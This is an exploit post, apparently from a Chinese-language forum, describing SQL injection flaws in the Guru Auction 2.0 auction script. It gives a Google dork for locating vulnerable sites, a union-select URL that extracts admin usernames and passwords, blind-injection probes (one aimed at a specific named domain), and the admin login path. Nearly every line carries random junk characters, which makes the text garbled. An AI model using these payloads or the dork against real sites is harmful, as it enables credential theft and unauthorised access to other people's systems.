Guru Auction 2.0 Multiple SQL Injection Vulnerabilities3 S, _' P) s/ S& E4 N7 B
6 c2 j- K1 H+ k) \* D; z" Q
作者 : v3n0m
. M1 C# b5 x( {2 b- {: n( M应用 : Guru Auction 2.06 _4 G4 e+ s9 c0 _1 h9 K
Price : $49/ h; }. Y1 B' W ?
Vendor : http://www.guruscript.com/
3 m2 c4 T9 A4 X; S" dGoogle Dork : inurl:subcat.php?cate_id=) ~" N7 n& U5 {) t) \8 r/ m" \
9 B) q1 Q) Y' p( p
SQLi p0c:7 a) n; l' Z( y2 v1 P
~~~~~~~~~~+ \7 g$ g0 H5 @) Q
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--: T! G! O; P7 o
. h/ a O: d l. q0 F
' K% ]( d: s5 w& z( U: l9 E
盲注 p0c:
* f6 H% p) n2 O+ z~~~~~~~~~~7 C$ e/ _" p p, ~0 [; }2 j
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true- ]6 z1 p& n4 @0 y/ H& m
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false0 }6 A3 C. ^2 C
3 R* T3 |. i& `( K* Y管理登录入口:' t# t v6 R3 P8 `* k5 f: ~
~~~~~~~~~~
2 e- i/ L7 S( h% h6 u$ Vhttp://domain.tld/[path]/admin/3 z* b; P1 w Y* }3 q: M$ |
|